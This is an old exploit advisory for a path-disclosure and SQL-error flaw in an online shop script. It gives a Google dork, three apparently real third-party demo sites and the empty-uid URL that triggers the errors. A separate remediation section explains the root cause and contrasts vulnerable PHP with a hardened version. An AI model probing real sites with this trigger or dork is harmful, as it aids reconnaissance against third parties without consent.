# Exploit Title: Full Path Disclosure and SQL Error in ONLINE SHOP IGT
# Date: 24/02/2012
# Author: MaztoR
# Vendor or Software Link: http://www.igt.com.hk
# Version: ALL
# Category: webapps Shop
# Google dork: inurl:company_index.php
# Tested on: Linux
-----------------
DEMO
-----------------
http://colate20101022.tradinghand.com/company_index.php?id=1602&file=home&prod=prod&uid=
http://www.tiendaguasu.com/company_index.php?id=&file=home&prod=&uid=
http://www.szdigo.supplier-buy.com/company_index.php?id=2656&file=home&prod=sell&uid=
----------------
Vulnerability
----------------
Exploit:
======================
http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]
======================
Example:
======================
http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=
Result 1 (FPD): Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3
Result 2 (SQL error): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]
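Both results above point at the same root cause: the uid parameter is concatenated into a MySQL query with no validation, the failed query produces a warning from mysql_fetch_array(), and display_errors is on, so the server's filesystem path and the MySQL error text are echoed to the visitor. The PHP below is an added illustration, not the vendor's code; it shows the vulnerable pattern next to a hardened one. The table and column names (users, uid, name), the PDO connection details and the page logic are assumptions.

```php
<?php
// Added example, not taken from the IGT shop code. Table/column names are assumed.

// --- Vulnerable pattern (the shape that produces the advisory's two results) ---
// Uses the legacy mysql_* extension that the original error message comes from
// (removed in PHP 7); shown only to explain the behaviour.
function lookup_user_vulnerable($link, $uid_from_request)
{
    // $uid_from_request is $_GET['uid'] verbatim. An empty value yields
    // "SELECT ... WHERE uid = " and MySQL answers "You have an error in your SQL syntax".
    $result = mysql_query("SELECT * FROM users WHERE uid = " . $uid_from_request, $link);
    // $result is now false; with display_errors=On the next call prints
    // "mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.../company_index.php"
    return mysql_fetch_array($result);
}

// --- Hardened pattern ---
function lookup_user_safe(PDO $pdo, $uid_from_request)
{
    // 1. Validate the type before the value gets near SQL: uid must be a positive integer.
    $uid = filter_var($uid_from_request, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($uid === false) {
        return null; // reject without touching the database
    }
    // 2. Bind through a prepared statement; the value is never parsed as SQL text.
    $stmt = $pdo->prepare('SELECT uid, name FROM users WHERE uid = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Keep error detail out of the response: log it server-side, show nothing
//    that reveals paths, query text or the database version.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Connection details are placeholders for this example.
$pdo = new PDO('mysql:host=localhost;dbname=shop;charset=utf8mb4', 'shop_user', 'CHANGE_ME', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION, // failures become exceptions, not warnings
    PDO::ATTR_EMULATE_PREPARES => false,                  // real server-side prepared statements
]);

try {
    $row = lookup_user_safe($pdo, isset($_GET['uid']) ? $_GET['uid'] : '');
    if ($row === null) {
        http_response_code(404);
        echo 'No such user';
    } else {
        echo htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8');
    }
} catch (PDOException $e) {
    error_log('company_index lookup failed: ' . $e->getMessage()); // server log only
    http_response_code(500);
    echo 'Internal error';
}
```

The three changes are independent and each closes a different part of the finding: the integer check stops a blank or non-numeric uid from ever forming a query, the prepared statement stops the parameter from being interpreted as SQL, and display_errors=0 plus a generic error page stops any remaining failure from leaking the document root or the MySQL error text. Checking a deployment for the same class of issue is as simple as requesting the page with an empty uid and confirming the response contains neither a filesystem path nor a MySQL error string.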
----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
Greetz: HielaSangre - Linuxfer - SunPlace - xDarkStonex - SeguridadBlanca - rbot
ALL USERS #RE - DDLR